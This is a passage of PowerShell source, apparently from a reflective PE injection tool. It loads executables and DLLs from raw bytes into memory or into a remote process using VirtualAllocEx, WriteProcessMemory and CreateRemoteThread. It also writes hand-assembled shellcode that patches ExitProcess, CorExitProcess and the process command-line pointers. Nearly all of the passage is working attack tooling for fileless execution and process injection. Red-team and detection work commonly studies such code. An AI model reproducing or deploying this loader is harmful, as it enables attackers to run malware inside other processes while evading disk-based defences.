($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero)\n\t\t\t\t{\n\t\t\t\t\t\"Error, couldn't find _wcmdln or _acmdln\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)\n\t\t\t\t$NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)\n\t\t\t\t\n\t\t\t\t#Make a copy of the original char* and wchar_t* so these variables can be returned back to their original state\n\t\t\t\t$OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr])\n\t\t\t\t$OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr])\n\t\t\t\t$OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t\t\t$OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false)\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false)\n\t\t\t\t$ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize)\n\t\t\t\t$ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize)\n\t\t\t\t\n\t\t\t\t$Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\t\t\tif ($Success = $false)\n\t\t\t\t{\n\t\t\t\t\tthrow \"Call to VirtualProtect failed\"\n\t\t\t\t}\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false)\n\t\t\t\t$Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null\n\t\t\t\t\n\t\t\t\t$Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n\t\t\t\tif ($Success = $false)\n\t\t\t\t{\n\t\t\t\t\tthrow \"Call to VirtualProtect failed\"\n\t\t\t\t}\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false)\n\t\t\t\t$Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null\n\t\t\t}\n\t\t}\n\t\t#################################################\n\t\t\n\t\t\n\t\t#################################################\n\t\t#Next overwrite CorExitProcess and ExitProcess to instead ExitThread. This way the entire Powershell process doesn't die when the EXE exits.\n\n\t\t$ReturnArray = @()\n\t\t$ExitFunctions = @() #Array of functions to overwrite so the thread doesn't exit the process\n\t\t\n\t\t#CorExitProcess (compiled in to visual studio c++)\n\t\t[IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke(\"mscoree.dll\")\n\t\tif ($MscoreeHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tthrow \"mscoree handle null\"\n\t\t}\n\t\t[IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, \"CorExitProcess\")\n\t\tif ($CorExitProcessAddr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"CorExitProcess address not found\"\n\t\t}\n\t\t$ExitFunctions += $CorExitProcessAddr\n\t\t\n\t\t#ExitProcess (what non-managed programs use)\n\t\t[IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"ExitProcess\")\n\t\tif ($ExitProcessAddr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"ExitProcess address not found\"\n\t\t}\n\t\t$ExitFunctions += $ExitProcessAddr\n\t\t\n\t\t[UInt32]$OldProtectFlag = 0\n\t\tforeach ($ProcExitFunctionAddr in $ExitFunctions)\n\t\t{\n\t\t\t$ProcExitFunctionAddrTmp = $ProcExitFunctionAddr\n\t\t\t#The following is the shellcode (Shellcode: ExitThread.asm):\n\t\t\t#32bit shellcode\n\t\t\t[Byte[]]$Shellcode1 = @(0xbb)\n\t\t\t[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)\n\t\t\t#64bit shellcode (Shellcode: ExitThread.asm)\n\t\t\tif ($PtrSize -eq 8)\n\t\t\t{\n\t\t\t\t[Byte[]]$Shellcode1 = @(0x48, 0xbb)\n\t\t\t\t[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)\n\t\t\t}\n\t\t\t[Byte[]]$Shellcode3 = @(0xff, 0xd3)\n\t\t\t$TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length\n\t\t\t\n\t\t\t[IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"ExitThread\")\n\t\t\tif ($ExitThreadAddr -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"ExitThread address not found\"\n\t\t\t}\n\n\t\t\t$Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Call to VirtualProtect failed\"\n\t\t\t}\n\t\t\t\n\t\t\t#Make copy of original ExitProcess bytes\n\t\t\t$ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)\n\t\t\t$Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null\n\t\t\t$ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize)\n\t\t\t\n\t\t\t#Write the ExitThread shellcode to memory. This shellcode will write 0x01 to ExeDoneBytePtr address (so PS knows the EXE is done), then \n\t\t\t#\tcall ExitThread\n\t\t\tWrite-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp\n\t\t\t$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length)\n\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false)\n\t\t\t$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize\n\t\t\tWrite-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp\n\t\t\t$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length)\n\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false)\n\t\t\t$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize\n\t\t\tWrite-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp\n\n\t\t\t$Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t}\n\t\t#################################################\n\n\t\tWrite-Output $ReturnArray\n\t}\n\t\n\t\n\t#This function takes an array of arrays, the inner array of format @($DestAddr, $SourceAddr, $Count)\n\t#\tIt copies Count bytes from Source to Destination.\n\tFunction Copy-ArrayOfMemAddresses\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Array[]]\n\t\t$CopyInfo,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants\n\t\t)\n\n\t\t[UInt32]$OldProtectFlag = 0\n\t\tforeach ($Info in $CopyInfo)\n\t\t{\n\t\t\t$Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Call to VirtualProtect failed\"\n\t\t\t}\n\t\t\t\n\t\t\t$Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null\n\t\t\t\n\t\t\t$Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\t\t}\n\t}\n\n\n\t#####################################\n\t##########    FUNCTIONS   ###########\n\t#####################################\n\tFunction Get-MemoryProcAddress\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$PEHandle,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[String]\n\t\t$FunctionName\n\t\t)\n\t\t\n\t\t$Win32Types = Get-Win32Types\n\t\t$Win32Constants = Get-Win32Constants\n\t\t$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t\n\t\t#Get the export table\n\t\tif ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0)\n\t\t{\n\t\t\treturn [IntPtr]::Zero\n\t\t}\n\t\t$ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)\n\t\t$ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)\n\t\t\n\t\tfor ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++)\n\t\t{\n\t\t\t#AddressOfNames is an array of pointers to strings of the names of the functions exported\n\t\t\t$NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))\n\t\t\t$NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32]))\n\t\t\t$Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr)\n\n\t\t\tif ($Name -ceq $FunctionName)\n\t\t\t{\n\t\t\t\t#AddressOfNameOrdinals is a table which contains points to a WORD which is the index in to AddressOfFunctions\n\t\t\t\t#    which contains the offset of the function in to the DLL\n\t\t\t\t$OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])))\n\t\t\t\t$FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16])\n\t\t\t\t$FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))\n\t\t\t\t$FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32])\n\t\t\t\treturn Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset)\n\t\t\t}\n\t\t}\n\t\t\n\t\treturn [IntPtr]::Zero\n\t}\n\n\n\tFunction Invoke-MemoryLoadLibrary\n\t{\n\t\tParam(\n\t\t[Parameter( Position = 0, Mandatory = $true )]\n\t\t[Byte[]]\n\t\t$PEBytes,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $false)]\n\t\t[String]\n\t\t$ExeArgs,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $false)]\n\t\t[IntPtr]\n\t\t$RemoteProcHandle\n\t\t)\n\t\t\n\t\t$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t\n\t\t#Get Win32 constants and functions\n\t\t$Win32Constants = Get-Win32Constants\n\t\t$Win32Functions = Get-Win32Functions\n\t\t$Win32Types = Get-Win32Types\n\t\t\n\t\t$RemoteLoading = $false\n\t\tif (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero))\n\t\t{\n\t\t\t$RemoteLoading = $true\n\t\t}\n\t\t\n\t\t#Get basic PE information\n\t\tWrite-Verbose \"Getting basic PE information from the file\"\n\t\t$PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types\n\t\t$OriginalImageBase = $PEInfo.OriginalImageBase\n\t\t$NXCompatible = $true\n\t\tif (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)\n\t\t{\n\t\t\tWrite-Warning \"PE is not compatible with DEP, might cause issues\" -WarningAction Continue\n\t\t\t$NXCompatible = $false\n\t\t}\n\t\t\n\t\t\n\t\t#Verify that the PE and the current process are the same bits (32bit or 64bit)\n\t\t$Process64Bit = $true\n\t\tif ($RemoteLoading -eq $true)\n\t\t{\n\t\t\t$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")\n\t\t\t$Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"IsWow64Process\")\n\t\t\tif ($Result -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit\"\n\t\t\t}\n\t\t\t\n\t\t\t[Bool]$Wow64Process = $false\n\t\t\t$Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Call to IsWow64Process failed\"\n\t\t\t}\n\t\t\t\n\t\t\tif (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4)))\n\t\t\t{\n\t\t\t\t$Process64Bit = $false\n\t\t\t}\n\t\t\t\n\t\t\t#PowerShell needs to be same bit as the PE being loaded for IntPtr to work correctly\n\t\t\t$PowerShell64Bit = $true\n\t\t\tif ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)\n\t\t\t{\n\t\t\t\t$PowerShell64Bit = $false\n\t\t\t}\n\t\t\tif ($PowerShell64Bit -ne $Process64Bit)\n\t\t\t{\n\t\t\t\tthrow \"PowerShell must be same architecture (x86/x64) as PE being loaded and remote process\"\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)\n\t\t\t{\n\t\t\t\t$Process64Bit = $false\n\t\t\t}\n\t\t}\n\t\tif ($Process64Bit -ne $PEInfo.PE64Bit)\n\t\t{\n\t\t\tThrow \"PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)\"\n\t\t}\n\t\t\n\n\t\t#Allocate memory and write the PE to memory. If the PE supports ASLR, allocate to a random memory address\n\t\tWrite-Verbose \"Allocating memory for the PE and write its headers to memory\"\n\t\t\n\t\t[IntPtr]$LoadAddr = [IntPtr]::Zero\n\t\tif (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)\n\t\t{\n\t\t\tWrite-Warning \"PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again\" -WarningAction Continue\n\t\t\t[IntPtr]$LoadAddr = $OriginalImageBase\n\t\t}\n\n\t\t$PEHandle = [IntPtr]::Zero\t\t\t\t#This is where the PE is allocated in PowerShell\n\t\t$EffectivePEHandle = [IntPtr]::Zero\t\t#This is the address the PE will be loaded to. If it is loaded in PowerShell, this equals $PEHandle. If it is loaded in a remote process, this is the address in the remote process.\n\t\tif ($RemoteLoading -eq $true)\n\t\t{\n\t\t\t#Allocate space in the remote process, and also allocate space in PowerShell. The PE will be setup in PowerShell and copied to the remote process when it is setup\n\t\t\t$PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\t\t\n\t\t\t#todo, error handling needs to delete this memory if an error happens along the way\n\t\t\t$EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\tif ($EffectivePEHandle -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use\"\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif ($NXCompatible -eq $true)\n\t\t\t{\n\t\t\t\t$PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\t}\n\t\t\t$EffectivePEHandle = $PEHandle\n\t\t}\n\t\t\n\t\t[IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage)\n\t\tif ($PEHandle -eq [IntPtr]::Zero)\n\t\t{ \n\t\t\tThrow \"VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free).\"\n\t\t}\t\t\n\t\t[System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null\n\t\t\n\t\t\n\t\t#Now that the PE is in memory, get more detailed information about it\n\t\tWrite-Verbose \"Getting detailed PE information from the headers loaded in memory\"\n\t\t$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle\n\t\tWrite-Verbose \"StartAddress: $PEHandle    EndAddress: $PEEndAddress\"\n\t\t\n\t\t\n\t\t#Copy each section from the PE in to memory\n\t\tWrite-Verbose \"Copy PE sections in to memory\"\n\t\tCopy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types\n\t\t\n\t\t\n\t\t#Update the memory addresses hardcoded in to the PE based on the memory address the PE was expecting to be loaded to vs where it was actually loaded\n\t\tWrite-Verbose \"Update memory addresses based on where the PE was actually loaded in memory\"\n\t\tUpdate-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types\n\n\t\t\n\t\t#The PE we are in-memory loading has DLLs it needs, import those DLLs for it\n\t\tWrite-Verbose \"Import DLL's needed by the PE we are loading\"\n\t\tif ($RemoteLoading -eq $true)\n\t\t{\n\t\t\tImport-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle\n\t\t}\n\t\telse\n\t\t{\n\t\t\tImport-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t}\n\t\t\n\t\t\n\t\t#Update the memory protection flags for all the memory just allocated\n\t\tif ($RemoteLoading -eq $false)\n\t\t{\n\t\t\tif ($NXCompatible -eq $true)\n\t\t\t{\n\t\t\t\tWrite-Verbose \"Update memory protection flags\"\n\t\t\t\tUpdate-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tWrite-Verbose \"PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute\"\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tWrite-Verbose \"PE being loaded in to a remote process, not adjusting memory permissions\"\n\t\t}\n\t\t\n\t\t\n\t\t#If remote loading, copy the DLL in to remote process memory\n\t\tif ($RemoteLoading -eq $true)\n\t\t{\n\t\t\t[UInt32]$NumBytesWritten = 0\n\t\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Unable to write shellcode to remote process memory.\"\n\t\t\t}\n\t\t}\n\t\t\n\t\t\n\t\t#Call the entry point, if this is a DLL the entrypoint is the DllMain function, if it is an EXE it is the Main function\n\t\tif ($PEInfo.FileType -ieq \"DLL\")\n\t\t{\n\t\t\tif ($RemoteLoading -eq $false)\n\t\t\t{\n\t\t\t\tWrite-Verbose \"Calling dllmain so the DLL knows it has been loaded\"\n\t\t\t\t$DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t\t\t$DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])\n\t\t\t\t$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)\n\t\t\t\t\n\t\t\t\t$DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t\t\n\t\t\t\tif ($PEInfo.PE64Bit -eq $true)\n\t\t\t\t{\n\t\t\t\t\t#Shellcode: CallDllMain.asm\n\t\t\t\t\t$CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9)\n\t\t\t\t\t$CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8)\n\t\t\t\t\t$CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t#Shellcode: CallDllMain.asm\n\t\t\t\t\t$CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9)\n\t\t\t\t\t$CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8)\n\t\t\t\t\t$CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t\t\t}\n\t\t\t\t$SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2)\n\t\t\t\t$SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)\n\t\t\t\t$SCPSMemOriginal = $SCPSMem\n\t\t\t\t\n\t\t\t\tWrite-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem\n\t\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length)\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false)\n\t\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\t\tWrite-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem\n\t\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length)\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false)\n\t\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\t\tWrite-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem\n\t\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length)\n\t\t\t\t\n\t\t\t\t$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\t\tif ($RSCAddr -eq [IntPtr]::Zero)\n\t\t\t\t{\n\t\t\t\t\tThrow \"Unable to allocate memory in the remote process for shellcode\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)\n\t\t\t\tif (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))\n\t\t\t\t{\n\t\t\t\t\tThrow \"Unable to write shellcode to remote process memory.\"\n\t\t\t\t}\n\n\t\t\t\t$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions\n\t\t\t\t$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\t\t\tif ($Result -ne 0)\n\t\t\t\t{\n\t\t\t\t\tThrow \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\t}\n\t\t}\n\t\telseif ($PEInfo.FileType -ieq \"EXE\")\n\t\t{\n\t\t\t#Overwrite GetCommandLine and ExitProcess so we can provide our own arguments to the EXE and prevent it from killing the PS process\n\t\t\t[IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)\n\t\t\t[System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00)\n\t\t\t$OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr\n\n\t\t\t#If this is an EXE, call the entry point in a new thread. We have overwritten the ExitProcess function to instead ExitThread\n\t\t\t#\tThis way the reflectively loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.\n\t\t\t[IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t\tWrite-Verbose \"Call EXE Main function. Address: $ExeMainPtr. Creating thread for the EXE to run in.\"\n\n\t\t\t$Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null\n\n\t\t\twhile($true)\n\t\t\t{\n\t\t\t\t[Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0)\n\t\t\t\tif ($ThreadDone -eq 1)\n\t\t\t\t{\n\t\t\t\t\tCopy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants\n\t\t\t\t\tWrite-Verbose \"EXE thread has completed.\"\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tStart-Sleep -Seconds 1\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t\n\t\treturn @($PEInfo.PEHandle, $EffectivePEHandle)\n\t}\n\t\n\t\n\tFunction Invoke-MemoryFreeLibrary\n\t{\n\t\tParam(\n\t\t[Parameter(Position=0, 